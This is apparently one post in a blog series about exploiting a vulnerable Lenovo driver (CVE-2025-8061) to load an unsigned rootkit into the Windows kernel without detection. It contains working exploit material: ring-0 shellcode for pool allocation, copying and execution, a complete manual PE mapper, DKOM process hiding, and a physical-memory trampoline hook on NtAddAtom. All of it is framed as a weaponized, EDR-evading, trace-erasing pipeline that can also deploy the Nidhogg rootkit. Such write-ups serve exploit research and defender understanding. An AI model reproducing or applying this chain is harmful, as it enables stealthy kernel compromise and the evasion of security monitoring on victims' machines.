the-ghost-in-the-machine

The complete source code and all supporting components are in the project repository: CVE-2025-8061. This series was inspired by Quarkslab’s article BYOVD to the next level.

In the previous part, we demonstrated how to use the Lenovo driver’s primitives to patch g_CiOptions, blinding Driver Signature Enforcement (DSE) so we could load an unsigned rootkit. But blinding DSE is loud.

As mentioned in the last post, traditional loading via NtLoadDriver creates a massive forensic footprint in the Registry and PsLoadedModuleList. Today, we fix that by dropping the payload directly into kernel memory.

This is Reflective Kernel Loading. In this post, we will walk through the exact process of manually mapping a compiled .sys file into Ring 0, the compiler traps that will intentionally crash your system, and how we ultimately achieved completely invisible DKOM (Direct Kernel Object Manipulation) execution.

Why Reflective Loading?

Patching g_CiOptions got us unsigned code execution. But we announced ourselves to every monitoring tool on the system the moment we called NtLoadDriver.

That syscall is a gift to defenders. The load shows up in the event log, depends on a Registry entry under the Services key, and permanently links an LDR_DATA_TABLE_ENTRY into PsLoadedModuleList. Any EDR worth its license fee enumerates that list constantly. We’d be visible before our DriverEntry even returned.

Reflective loading is the answer. Instead of handing our payload to the Windows OS Loader and asking it to parse, map, and register the driver for us, we do every single one of those steps ourselves in user-mode, and then drop the finished result directly into kernel memory. The OS never sees a load event because, as far as it’s concerned, one never happened.

The stealth properties follow naturally:

No OS Registration: We never call NtLoadDriver or touch the SCM. Our driver never enters PsLoadedModuleList, so kernel-walking EDRs have nothing to enumerate.
No Disk Artifacts: The .sys file never lands on the target’s filesystem. It can be pulled from a C2 server and mapped entirely in memory, leaving no path for file-based forensics or hash matching.
No API Hooks: Because we bypass NtLoadDriver entirely, any EDR relying on that chokepoint for telemetry is completely blind to us.

To pull this off through our LSTAR hijack, we need a three-stage pipeline:

Allocate: Execute a first-stage shellcode in Ring 0 to carve out a block of Non-Paged Pool memory as a trusted home for our payload.
Map and Relocate: In user-mode, manually parse the PE, lay out its sections, and rebase every absolute pointer against the actual kernel pool address.
Copy and Execute: Blast the prepared image into the kernel pool and jump directly to DriverEntry.

The Need for the Kernel Pool

We can’t simply point our LSTAR hijack at a buffer sitting in user-mode memory and call it a day. Two separate mechanisms would kill us before we got anywhere.

The first is SMEP. We defeated it in the previous posts using our MSR write primitive, but that’s a transient state. It’s not a permanent solution for housing a resident payload.

The second problem is more fundamental: paging. User-mode memory is pageable by design. The OS can evict any user-mode page to disk at any time. If our rootkit is sitting in paged memory and something tries to execute it at a raised IRQL where page faults are fatal, the kernel panics with a 0xD1 bugcheck. There’s no recovery.

We need memory that the kernel itself trusts unconditionally: the Non-Paged Pool. Pages in the Non-Paged Pool are guaranteed to always be resident in physical memory, are accessible from any IRQL, and carry the kernel’s implicit trust. This is where device drivers, DPC routines, and interrupt handlers live. It’s where our rootkit needs to live too.

To get there, our first-stage shellcode executes briefly in Ring 0 with one job: call ExAllocatePoolWithTag and hand us back the address.

; Stage 1: Pool Allocation Shellcode
xor rcx, rcx                ; PoolType = 0 (NonPagedPoolExecute)
mov rdx, 0x5000             ; NumberOfBytes = size of our driver
mov r8, 0x54534554          ; Tag = 'TEST'
mov rax, [ExAllocatePoolAddress]
call rax                    ; RAX = allocated kernel pool address
mov rdx, userModePtr
mov [rdx], rax              ; Save the kernel virtual address returned by the API

But how do we know the address of ExAllocatePoolWithTag to put in [ExAllocatePoolAddress]?

We already have the live kernel base: we leaked ntoskrnl.exe’s load address earlier in the exploit chain using NtQuerySystemInformation. From there, resolving any kernel export is straightforward. We load a local copy of ntoskrnl.exe into our process using DONT_RESOLVE_DLL_REFERENCES, then use GetProcAddress to find the function’s address within that local copy. Since ASLR only slides the base, the offset of any export from the module base is identical between our local copy and the live kernel image:

UINT64 GetKernelModuleExport(UINT64 moduleLiveBase, const char* moduleName, const char* functionName) {

	// Safely map the module into user-space without executing any DllMain
	HMODULE hModule = LoadLibraryExA(moduleName, NULL, DONT_RESOLVE_DLL_REFERENCES);

	if (!hModule) {
		// If it fails, it might be a driver in the drivers directory (e.g., fltmgr.sys)
		char driverPath[MAX_PATH];
		snprintf(driverPath, MAX_PATH, "C:\\Windows\\System32\\drivers\\%s", moduleName);
		hModule = LoadLibraryExA(driverPath, NULL, DONT_RESOLVE_DLL_REFERENCES);
		if (!hModule) {
			printf("[-] Failed to load module locally: %s\n", moduleName);
			return 0;
		}
	}

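	// GetProcAddress returns NULL for a missing export; bail out instead of computing a bogus offset
	FARPROC localAddr = GetProcAddress(hModule, functionName);
	if (!localAddr) {
		FreeLibrary(hModule);
		return 0;
	}

	UINT64 qFunctionOffset = (UINT64)localAddr - (UINT64)hModule;
	UINT64 functionAddr = moduleLiveBase + qFunctionOffset;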

	FreeLibrary(hModule);

	return functionAddr;
}

// Resolving ExAllocatePoolWithTag:
UINT64 ExAllocatePoolWithTag = GetKernelModuleExport(
    kernelBase, "ntoskrnl.exe", "ExAllocatePoolWithTag"
);

We embed this resolved address into our shellcode, fire the exploit, and read RAX back from Ring 0. What comes back is a raw, executable, always-resident chunk of kernel memory.

User-Mode Manual Mapping and Relocation

We have a kernel pool address. Now we need to answer a deceptively simple question: what exactly do we copy into it?

The instinct is to just read the .sys file off disk and blast its raw bytes into the pool. That won’t work. A PE file on disk is a storage format, not an execution format. The Windows OS Loader normally bridges that gap but now we have to do its job ourselves. There are two problems to solve.

First, the layout is wrong. On disk, PE sections are packed at FileAlignment boundaries (typically 512 bytes) to minimize file size. In memory, they need to be expanded to SectionAlignment boundaries (typically 4096 bytes, one page). The .text section that starts at file offset 0x400 might need to live at virtual offset 0x1000. If you copy the raw file and jump into it, you’re executing garbage.
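The gap between the two layouts can be illustrated with a small, portable sketch. The section_info struct and both helper names are hypothetical stand-ins for the relevant IMAGE_SECTION_HEADER fields, not part of the project’s code:

```c
#include <stdint.h>

/* Round value up to the next multiple of alignment (alignment must be a power of two). */
static uint32_t align_up(uint32_t value, uint32_t alignment) {
    return (value + alignment - 1) & ~(alignment - 1);
}

/* Hypothetical, trimmed-down view of one section header. */
typedef struct {
    uint32_t virtual_address;      /* RVA of the section once mapped   */
    uint32_t virtual_size;         /* size of the section in memory    */
    uint32_t pointer_to_raw_data;  /* offset of the section in the file */
    uint32_t size_of_raw_data;     /* bytes stored in the file          */
} section_info;

/* Translate an RVA into a file offset.
 * Returns 0 when the RVA is not backed by any file data. */
static uint32_t rva_to_file_offset(const section_info *sections,
                                   uint32_t count, uint32_t rva) {
    for (uint32_t i = 0; i < count; i++) {
        const section_info *s = &sections[i];
        if (rva >= s->virtual_address &&
            rva - s->virtual_address < s->size_of_raw_data) {
            return s->pointer_to_raw_data + (rva - s->virtual_address);
        }
    }
    return 0;
}
```

With a .text section stored at file offset 0x400 and mapped at RVA 0x1000, the byte at RVA 0x1010 lives at file offset 0x410, which is why the raw file cannot be executed in place.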

Second, the pointers are wrong. The linker froze every absolute address in the binary on the assumption that the image would load at its preferred ImageBase, for example 0x140000000. Our kernel pool is at something like 0xFFFFB880C4210000. Every hardcoded pointer in the image is off by that entire difference. If your driver’s .data section has a global variable and the code reaches it through an absolute address baked in at build time, it will read from completely wrong memory and either corrupt something or fault.

We fix both problems in user-mode before a single byte touches the kernel. Doing this work in Ring 0 shellcode would be possible but deeply unpleasant. One bad pointer dereference at that stage and you’re staring at a bugcheck. User-mode is safe, debuggable, and forgiving.

Phase 1: Parsing the PE Headers

Everything starts with the PE header chain. We cast the raw file bytes to IMAGE_DOS_HEADER, validate the MZ magic (0x5A4D), follow e_lfanew to reach the IMAGE_NT_HEADERS64, and validate the PE\0\0 signature.

From the NT headers we extract two critical values: SizeOfImage, which tells us how large the fully expanded in-memory image will be, and ImageBase, which tells us what address the compiler was assuming when it froze all those pointers.

PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)rawData;
PIMAGE_NT_HEADERS64 pNtHeaders = (PIMAGE_NT_HEADERS64)(rawData + pDosHeader->e_lfanew);

Phase 2: Allocating the Local Shadow Buffer

We need a local user-mode buffer that mirrors the final in-memory layout of the driver so we can do all our fixups safely before deployment. We allocate SizeOfImage bytes with VirtualAlloc. This gives us a zero-initialized region large enough to hold the fully expanded image:

void* localImageBase = VirtualAlloc(NULL, pNtHeaders->OptionalHeader.SizeOfImage,
                                    MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

Phase 3: Mapping the Headers and Sections

The PE headers go first. We copy SizeOfHeaders bytes from the raw file to the base of the local buffer which preserves the header data that some runtime code may need to walk:

memcpy(localImageBase, rawData, pNtHeaders->OptionalHeader.SizeOfHeaders);

Then we expand each section. We walk the IMAGE_SECTION_HEADER array (.text, .data, .rdata, .pdata…) and for each one, copy SizeOfRawData bytes from the file offset (PointerToRawData) to the correct in-memory offset (VirtualAddress):

PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNtHeaders);
for (int i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++, pSection++) {
    if (pSection->SizeOfRawData > 0) {
        memcpy(
            (UINT8*)localImageBase + pSection->VirtualAddress,  // expanded in-memory position
            rawData + pSection->PointerToRawData,                 // packed on-disk position
            pSection->SizeOfRawData
        );
    }
}

Phase 4: Base Relocations

Every absolute address the compiler baked into the binary is wrong, and we have to correct all of them before execution.

The compiler left us a map for doing exactly this: the .reloc section, formally the Base Relocation Directory. It’s a list of every location in the image that contains an absolute pointer that needs to be adjusted if the image loads somewhere other than ImageBase.

We calculate the delta, the difference between where the image actually lives (our kernel pool address) and where the linker thought it would live, and add that delta to every pointer the relocation table identifies:

UINT64 delta = allocatedKernelPool - pNtHeaders->OptionalHeader.ImageBase;
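As a worked example of that arithmetic, here is a small sketch using the two addresses quoted earlier in this post. The helper names are hypothetical; the point is that unsigned 64-bit subtraction wraps modulo 2^64, so the same code works whether the image moves up or down:

```c
#include <stdint.h>

/* delta = actual base - preferred base, computed modulo 2^64. */
static uint64_t reloc_delta(uint64_t actual_base, uint64_t preferred_base) {
    return actual_base - preferred_base;
}

/* Rebase one absolute pointer that was linked against the preferred base. */
static uint64_t rebase(uint64_t linked_pointer, uint64_t delta) {
    return linked_pointer + delta;
}
```

A pointer linked as 0x140003010 against ImageBase 0x140000000 sits 0x3010 bytes into the image, so after rebasing to 0xFFFFB880C4210000 it becomes 0xFFFFB880C4213010.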

The relocation data is organized as a series of IMAGE_BASE_RELOCATION blocks, each covering a 4KB page of the image. Each block starts with the VirtualAddress of the page it describes and a SizeOfBlock field, followed by a packed array of 16-bit entries. The top 4 bits of each entry are the relocation type; the bottom 12 bits are the offset within the page to the pointer that needs patching:

PIMAGE_BASE_RELOCATION pReloc = (PIMAGE_BASE_RELOCATION)(
    (UINT8*)localImageBase +
    pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress
);

while (pReloc->VirtualAddress != 0) {
    UINT32 entryCount = (pReloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION))
                        / sizeof(BASE_RELOCATION_ENTRY);
    PBASE_RELOCATION_ENTRY pEntry = (PBASE_RELOCATION_ENTRY)(pReloc + 1);

    for (UINT32 i = 0; i < entryCount; i++, pEntry++) {
        if (pEntry->Type == IMAGE_REL_BASED_DIR64) {
            UINT64* ptr = (UINT64*)((UINT8*)localImageBase
                          + pReloc->VirtualAddress
                          + pEntry->Offset);
            *ptr += delta;
        }
    }
    pReloc = (PIMAGE_BASE_RELOCATION)((UINT8*)pReloc + pReloc->SizeOfBlock);
}

We only handle IMAGE_REL_BASED_DIR64 entries, the only type that carries a real fixup in a 64-bit kernel driver; the IMAGE_REL_BASED_ABSOLUTE entries that pad each block are skipped by the same type check. Each DIR64 entry points us at an 8-byte absolute address embedded somewhere in the image. We add delta to it, and that pointer now correctly references the actual kernel pool address.
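BASE_RELOCATION_ENTRY in the loop above is not a Windows SDK type; it is presumably a two-field bitfield defined in the project. The same decoding can be sketched with plain masks and shifts. The helper names here are illustrative, and the two type constants mirror IMAGE_REL_BASED_ABSOLUTE and IMAGE_REL_BASED_DIR64:

```c
#include <stdint.h>

#define REL_BASED_ABSOLUTE 0   /* padding entry, no fixup required */
#define REL_BASED_DIR64    10  /* 64-bit absolute address          */

/* Top 4 bits: relocation type. */
static unsigned reloc_type(uint16_t entry) {
    return entry >> 12;
}

/* Bottom 12 bits: offset of the pointer inside the 4KB page. */
static unsigned reloc_offset(uint16_t entry) {
    return entry & 0x0FFF;
}

/* Number of 16-bit entries in a block whose header is 8 bytes
 * (VirtualAddress + SizeOfBlock). */
static uint32_t reloc_entry_count(uint32_t size_of_block) {
    return size_of_block < 8 ? 0 : (size_of_block - 8) / 2;
}
```

For example, the entry 0xA010 decodes to type 10 (DIR64) at page offset 0x010, and a 12-byte block holds two entries.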

Phase 5: Resolving the Import Address Table

The final step is fixing the IAT. Our driver may import kernel functions it needs. On disk, the IAT slots do not hold real addresses; they hold the same values as the import name table, either the RVA of a hint/name entry or an ordinal. The OS Loader normally walks the Import Directory, finds each imported module, and overwrites those slots with live function pointers. We have to do the same.

We walk the IMAGE_IMPORT_DESCRIPTOR array. Each entry names a module and contains two parallel thunk arrays: the Original First Thunk (which preserves the import names for us to look up) and the First Thunk (the actual IAT slots we need to overwrite with live addresses). For each imported function, we call our GetKernelModuleExport helper, which resolves the live kernel address using the same local-copy offset technique we used to find ExAllocatePoolWithTag, and write the result directly into the IAT slot:

while (pImportDesc->Name != 0) {
    char* moduleName = (char*)((UINT8*)localImageBase + pImportDesc->Name);

    PIMAGE_THUNK_DATA64 pFirstThunk = (PIMAGE_THUNK_DATA64)((UINT8*)localImageBase + pImportDesc->FirstThunk);
    PIMAGE_THUNK_DATA64 pOriginalFirstThunk = (PIMAGE_THUNK_DATA64)((UINT8*)localImageBase + 
        (pImportDesc->OriginalFirstThunk ? pImportDesc->OriginalFirstThunk : pImportDesc->FirstThunk));

    // Determine the live base address for the imported module
    // If importing from other than ntoskrnl, we would need to privesc first
    UINT64 moduleLiveBase;
    if (strcmp(moduleName, "ntoskrnl.exe") == 0) moduleLiveBase = liveNtoskrnlBase;
    else moduleLiveBase = LeakKernelModuleBase(moduleName); 

    while (pOriginalFirstThunk->u1.AddressOfData != 0) {
        UINT64 kernelFunctionAddress = 0;

        // Check if importing by Ordinal or by Name
        if (IMAGE_SNAP_BY_ORDINAL64(pOriginalFirstThunk->u1.Ordinal)) {
            UINT16 ordinal = IMAGE_ORDINAL64(pOriginalFirstThunk->u1.Ordinal);
            kernelFunctionAddress = GetKernelModuleExport(moduleLiveBase, moduleName, (const char*)(uintptr_t)ordinal);
        } else {
            PIMAGE_IMPORT_BY_NAME pImportByName = (PIMAGE_IMPORT_BY_NAME)((UINT8*)localImageBase + pOriginalFirstThunk->u1.AddressOfData);
            kernelFunctionAddress = GetKernelModuleExport(moduleLiveBase, moduleName, pImportByName->Name);
        }
        
        // Write the live kernel address into the driver's IAT
        pFirstThunk->u1.Function = kernelFunctionAddress;

        pFirstThunk++;
        pOriginalFirstThunk++;
    }
    pImportDesc++;
}
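The ordinal-versus-name test in the loop relies on the layout of a 64-bit thunk. A portable sketch of what the IMAGE_SNAP_BY_ORDINAL64 and IMAGE_ORDINAL64 macros do is shown below; the function names are hypothetical, and the bit positions follow the PE format specification:

```c
#include <stdint.h>

#define ORDINAL_FLAG64 0x8000000000000000ull  /* bit 63 set: import by ordinal */

/* Non-zero when the thunk describes an import by ordinal. */
static int thunk_is_ordinal(uint64_t thunk) {
    return (thunk & ORDINAL_FLAG64) != 0;
}

/* Ordinal imports keep the ordinal number in the low 16 bits. */
static uint16_t thunk_ordinal(uint64_t thunk) {
    return (uint16_t)(thunk & 0xFFFF);
}

/* Name imports keep the RVA of an IMAGE_IMPORT_BY_NAME record
 * (2-byte hint followed by the name) in the low 31 bits. */
static uint32_t thunk_name_rva(uint64_t thunk) {
    return (uint32_t)(thunk & 0x7FFFFFFF);
}
```

A thunk of 0x8000000000000007 therefore means "ordinal 7", while 0x0000000000002F40 means "look up the name stored at RVA 0x2F40".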

At the end of this function we return a user-mode buffer containing a fully laid-out, relocated, import-resolved image of our driver, calibrated to live at allocatedKernelPool. It’s ready to be copied into the kernel, and we are ready to deploy.

For the copy shellcode, we simply use the x64 rep movsb instruction.

; COPY
cld                         ; Clear direction flag
mov rdi, KernelPoolAddress  ; Destination (Kernel)
mov rsi, UserModeBuffer     ; Source (User-mode)
mov rcx, poolSize           ; How much to copy
rep movsb                   ; Fire!

; EXECUTE
xor rcx, rcx                ; Arg 1: DriverObject = NULL
xor rdx, rdx                ; Arg 2: RegistryPath = NULL
mov rax, absoluteEntryPoint ; Calculate Entry Point
call rax                    ; Execute the Rootkit!

Notice that we explicitly pass NULL (xor rcx, rcx) as the DriverObject. Since the OS didn’t load us, we don’t have one.

We fired the exploit. The shellcode executed. And the system instantly blue-screened.

Bugcheck 0x139 with Argument 1 set to 0x6. In the Windows kernel, 0x6 translates to FAST_FAIL_GS_COOKIE_INIT.

When you compile a C project using Visual Studio and the WDK, it injects security mitigations, most notably the Buffer Security Check (/GS) or “Stack Cookie.”

Normally, when the Windows OS Loader starts a driver, it initializes a randomized __security_cookie inside the .data section before DriverEntry is called. Protected functions place a copy of this cookie on the stack on entry and check it on exit to detect stack buffer overflows.

Because we bypassed the OS Loader, the cookie was never initialized. The compiler’s injected check saw a cookie that still held its build-time default value, assumed something was wrong, and executed an int 29h (__fastfail), bugchecking the system.

So we cannot use standard compiler security mitigations in a reflectively mapped kernel payload. We have to strip them from the project:

Release Mode: Debug mode forces cookies regardless of settings. We switched to Release.
Disable /GS: Set Buffer Security Check to Disable (/GS-).
Disable /sdl: Set SDL Checks to No (/sdl-). Visual Studio uses SDL as a master override; if it’s on, /GS comes back from the dead.
Override the Entry Point: The WDK linker defaults to GsDriverEntry (a wrapper that checks the cookie). We forced the linker Entry Point directly to DriverEntry.

After verifying with dumpbin /disasm that the references to __security_cookie were gone, we redeployed. And hit another blue screen.

The Second Trap: The Object Manager Illusion (Bugcheck 0xD1)

This crash was a 0xD1 (DRIVER_IRQL_NOT_LESS_OR_EQUAL), but the main hint was Argument 1: The instruction attempted to access memory address 0x68.

Why 0x68? Because 0x68 is exactly NULL + 0x68.

In the 64-bit Windows kernel, 0x68 is the exact byte offset for DriverUnload inside the _DRIVER_OBJECT structure. Inside our DriverEntry, we had standard boilerplate code:

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    DriverObject->DriverUnload = UnloadRoutine; // <--- FATAL FLAW
    // ...
}

Because we reflectively loaded the driver, we passed NULL in the RCX register for the DriverObject. When our C code said “go to DriverObject and write to the DriverUnload field,” the CPU calculated 0x0 + 0x68, tried to access the protected unmapped zero-page, and instantly crashed the system.
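The 0x68 figure can be reproduced with a mock structure. The sketch below is an assumption-laden stand-in, not the real WDK definition: the mock_ types are hypothetical, every pointer field is modelled as a uint64_t, and it assumes a 64-bit ABI where uint64_t is 8-byte aligned. The field order follows the documented x64 _DRIVER_OBJECT layout:

```c
#include <stddef.h>
#include <stdint.h>

/* Mock of UNICODE_STRING: 16 bytes on x64 because of padding before Buffer. */
typedef struct {
    uint16_t Length;
    uint16_t MaximumLength;
    uint64_t Buffer;
} mock_unicode_string;

/* Mock of the leading fields of _DRIVER_OBJECT on x64. */
typedef struct {
    int16_t  Type;
    int16_t  Size;
    uint64_t DeviceObject;
    uint32_t Flags;
    uint64_t DriverStart;
    uint32_t DriverSize;
    uint64_t DriverSection;
    uint64_t DriverExtension;
    mock_unicode_string DriverName;
    uint64_t HardwareDatabase;
    uint64_t FastIoDispatch;
    uint64_t DriverInit;
    uint64_t DriverStartIo;
    uint64_t DriverUnload;
} mock_driver_object;

/* Address the CPU touches when code writes object->DriverUnload. */
static uintptr_t faulting_address(uintptr_t object_pointer) {
    return object_pointer + offsetof(mock_driver_object, DriverUnload);
}
```

With a NULL object pointer the computed address is the field offset itself, which is exactly the value reported in Argument 1 of the bugcheck.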

When you reflectively load a driver, you are not a legitimate driver. You are uninvited code running in Ring 0. You have no DRIVER_OBJECT, and you cannot use anything that expects the OS to have created one for you.

We deleted all references to DriverObject, which in our case was just the Unload routine. Our DriverEntry was stripped down to a raw, pure DKOM execution function that simply iterated the PsActiveProcessLinks doubly-linked list, found our target hello.exe, and unlinked it.

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    UNREFERENCED_PARAMETER(DriverObject);
    
    // Execute DKOM directly, ignore OS integration
    WalkProcListAndHide(); 
    
    return STATUS_SUCCESS;
}

The Invisible Execution

With the compiler traps stripped and the Object Manager illusions removed, we launched the exploit one final time.

The shellcode successfully executed.
The manual mapper relocated the buffer.
The rep movsb copied the payload into the Non-Paged pool.
The execution jumped to DriverEntry.

hello.exe disappeared from Task Manager. We dumped PsLoadedModuleList in WinDbg. Our rootkit was nowhere to be found.

By combining the MSR LSTAR hijack with a fully weaponized reflective loader, we completely bypassed Driver Signature Enforcement without leaving a single trace on the disk or in the OS loader logs.

We can extend this loader beyond our minimal DKOM payload. A more capable rootkit like Nidhogg maps cleanly through the same pipeline; the only requirements are that DRIVER_REFLECTIVELY_LOADED is defined before compilation so Nidhogg skips its own driver registration logic, and that the binary is built with security cookies disabled for the same reasons we covered earlier.

Why This Implementation Will Eventually Kill Your System

At this point the exploit works, but it’s sitting on a time bomb.

The issue isn’t correctness, it’s stability under memory pressure. To demonstrate, lower the target VM’s RAM to 2GB and run the exact same exploit against Nidhogg.

The system bugchecks with 0xA, IRQL_NOT_LESS_OR_EQUAL. The kernel attempted to access a virtual address at a raised IRQL and the page wasn’t there. The first argument is the faulting address; the third (0x0) confirms this was a read, not a write.

The IRQL Trap

Because we hijacked LSTAR and used our ROP chain to disable hardware interrupts, we effectively put the processor in the same position as a high Interrupt Request Level (IRQL). Clearing the interrupt flag does not change the IRQL value itself, but the practical constraints are those of an elevated IRQL (like DIRQL or HIGH_LEVEL). In that state the kernel cannot service page faults, because fetching memory from disk fundamentally relies on the very interrupts we just muted.

When Nidhogg’s DriverEntry starts doing its heavy lifting (allocating memory, registering object callbacks, resolving strings…) it touches memory that Windows previously deemed non-essential and swapped out to the disk (the pagefile) due to our artificial 2GB RAM starvation.

The CPU hits the missing page and raises a page fault. To resolve it, the fault handler would have to wait for the page to be read back from disk, which is impossible with interrupts disabled, so the kernel bugchecks instead. Under high memory pressure, the crash was an inevitable architectural collision.

What We Are Missing

We brute-forced a raw Ring-0 transition right into a massive rootkit initialization routine. By doing so, we are missing the foundational OS structures required for a stable payload execution:

A Clean PASSIVE_LEVEL Context: Necessary to handle page faults, pool allocations, and blocking kernel API calls.
Thread State Alignment: Windows expects a specific thread state when running heavy NTAPI functions (like ObRegisterCallbacks).
Proper Exception Handling: We ran under non-paged constraints, where no page fault may occur, while the rootkit was touching pageable memory.

The Fix: Hooking Over Hijacking

To fix this, we need to stop treating the LSTAR ROP chain as our primary execution environment and start treating it as a brief tool. We cannot execute a heavy rootkit directly from a hijacked syscall context.

How do we achieve stable execution? The solution is to place an inline hook on an obscure, rarely used system call to gracefully redirect execution to our payload.

The immediate hurdle is that kernel executable pages are strictly marked as Read-Execute (RX) in virtual memory; if we try to overwrite them directly, the system will crash. However, page permissions are purely a virtual memory construct enforced by the CPU’s MMU. Raw physical RAM has no concept of “read-only.”

This is where the arbitrary physical read/write primitives we discovered in the vulnerable driver (from Part 1) finally become the star of the show. By interacting directly with physical memory, we can completely bypass the OS’s virtual memory protections.

So what we need to do is:

Load the Driver in Memory: The initial stage of our manual mapping process remains completely unchanged. We can reuse our existing logic to allocate a kernel pool and copy the rootkit’s PE sections into it. Because we explicitly allocate this space using a non-paged pool type (e.g., NonPagedPool), the driver’s actual bytes are permanently pinned in RAM.
Leak the Physical Address: We use our LSTAR hijack to execute a tiny, safe shellcode stub that calls MmGetPhysicalAddress. This translates the virtual address of our target system call into its exact physical memory location.
Plant the Hook: Using the driver’s physical write primitive, we write a trampoline (a jump instruction) directly to that physical address, redirecting the system call to Nidhogg’s DriverEntry.
Execute and Clean Up: We trigger the hooked system call natively from user-mode. Once Nidhogg successfully initializes in a stable PASSIVE_LEVEL environment, we use the physical write primitive one last time to restore the original bytes, erasing our tracks.

This exact methodology is the stable solution documented by Quarkslab in their deep-dive on this CVE: BYOVD to the next level (part 2) — rootkit like it’s 2025.

It’s time to refactor our exploit to use this physical memory route.

The Physical Hooking Implementation

To achieve the stable, PASSIVE_LEVEL execution that a heavy rootkit requires, we must bridge the gap between our initial virtual memory setup and the raw physical memory primitives provided by the vulnerable driver.

Phase 1: Resolving Dependencies and Locking Memory

Before we can manipulate anything, we need the exact addresses of our targets. We use GetKernelModuleExport to resolve the virtual addresses of both NtAddAtom (our target system call) and MmGetPhysicalAddress (the kernel routine that translates a virtual address into a physical one).

// Allocate memory for a full 64-bit pointer (8 bytes)
Buffer = VirtualAlloc(NULL, sizeof(UINT64), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// Lock it in physical RAM so the OS cannot page it to disk
VirtualLock(Buffer, sizeof(UINT64));
volatile UINT64& NtAddAtomPhys = *(volatile UINT64*)Buffer;

Phase 2: The NtAddAtom Address Leak

Instead of using the LSTAR ROP chain to execute the massive rootkit, we reduce its role to a split-second operation: translating our virtual address.

The BuildLeakNtAtomPayload function constructs a tiny, precise piece of shellcode:

mov rcx, NtAddAtom            ; Sets up the first argument: the virtual address we want to translate
mov rax, MmGetPhysicalAddress 
call rax                      ; Call the translation function
mov rdx, userModeBuffer
mov [rdx], rax                ; Writes the physical address into user-mode memory

Phase 3: The Physical Hooking Mechanism

With the physical address secured, we move to the core of the bypass. Virtual memory pages containing kernel code are strictly marked as Read-Execute (RX). If we tried to use a standard kernel virtual-write primitive to overwrite NtAddAtom, the Memory Management Unit (MMU) would block it.

However, physical memory has no concept of page protections. By routing our writes through the vulnerable driver’s physical memory primitive, we bypass the MMU entirely.

This is handled by the ExecutePayloadViaPhysicalHook function:

The 12-Byte Trampoline

BYTE hookBytes[12] = { 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xE0 };
*(UINT64*)(&hookBytes[2]) = PayloadAddress;

This is standard x64 absolute jump shellcode. It translates to:

mov rax, PayloadAddress     ; 48 B8 imm64: load the 64-bit address as an immediate
jmp rax                     ; FF E0

Read, Write, and Trigger

First, we use the physical read primitive to save the original 12 bytes of NtAddAtom. We must put these back later to keep the system running.

ReadPhysicalMemory(hDev, NtAddAtomPhys, sizeof(originalBytes), originalBytes);

Next we use the physical write primitive to overwrite the start of NtAddAtom with our trampoline.

WritePhysicalMemory(hDev, NtAddAtomPhys, hookBytes, sizeof(hookBytes));

This is where the magic happens. We drop back to user-mode and call NtAddAtom directly via ntdll.dll, which now executes our payload.

HMODULE hNtdll = GetModuleHandleA("ntdll.dll");

if (hNtdll) {
	pNtAddAtom triggerNtAddAtom = (pNtAddAtom)GetProcAddress(hNtdll, "NtAddAtom");
	if (triggerNtAddAtom) {
		// This drops us into Ring-0 legally, cleanly, and at PASSIVE_LEVEL.
		// The kernel hits our hook, jumps to Nidhogg's DriverEntry, initializes, and returns.
		triggerNtAddAtom(NULL, 0, NULL);
    }
}

Why ntdll.dll? By calling the native API from user-mode, the Windows operating system performs a completely legitimate context switch into Ring-0. It sets up the thread state, handles the syscall transition, and enters the kernel at a clean, stable PASSIVE_LEVEL.

When the OS blindly jumps to NtAddAtom, it hits our physical trampoline and redirects straight into Nidhogg’s DriverEntry. The rootkit initializes natively and returns.

Immediately after Nidhogg returns execution to us, we use our physical write primitive one last time to write the originalBytes back into memory.

Because we abandoned the hijacked ROP context to initialize the rootkit and instead opted for a clean syscall transition via a physical hook, the system remains completely stable, even when RAM usage is over 80%.

Conclusion: The Perfect Ghost

What started as a simple Bring Your Own Vulnerable Driver (BYOVD) exploit has evolved into a fully weaponized, untraceable rootkit deployment pipeline. We didn’t just temporarily blind Driver Signature Enforcement; we completely removed the Windows operating system from the loading equation.

By manually mapping the PE file in user-mode, resolving its imports against the live kernel, and copying it directly into the Non-Paged Pool, we achieved our primary goal: absolute stealth. We left no Event Logs, created no Service Registry keys, and left no LDR_DATA_TABLE_ENTRY sitting in the PsLoadedModuleList for EDRs to find.

However, as we discovered, dropping code into Ring 0 is only half the battle. Raw execution is not the same as stable execution. By abandoning the fragile, elevated-IRQL context of our LSTAR hijack and pivoting to a transient physical memory hook, we built a bridge to a clean PASSIVE_LEVEL thread. This allowed a heavy, complex rootkit like Nidhogg to initialize natively, allocate memory, and register callbacks without triggering a system-halting bugcheck even under extreme RAM starvation.

Here is the final anatomy of our exploit chain:

Initial Access: Exploiting a vulnerable driver for arbitrary physical read/write primitives.
Execution Primitive: Hijacking the LSTAR MSR to gain transient Ring-0 code execution.
Memory Preparation: Using a first-stage shellcode to safely allocate trusted Non-Paged Pool memory.
Manual Mapping: Parsing, rebasing, and resolving the rootkit PE entirely in user-mode to evade OS loading telemetry.
Stabilization: Translating the virtual address of NtAddAtom to physical memory and hooking it via raw physical writes to bypass MMU Read-Execute (RX) protections.
Deployment: Triggering the hooked syscall via ntdll.dll to execute the rootkit in an OS-backed thread state before instantly restoring the original bytes to erase our tracks.

The result is the perfect ghost in the machine.

> Previous: bypassing-dse
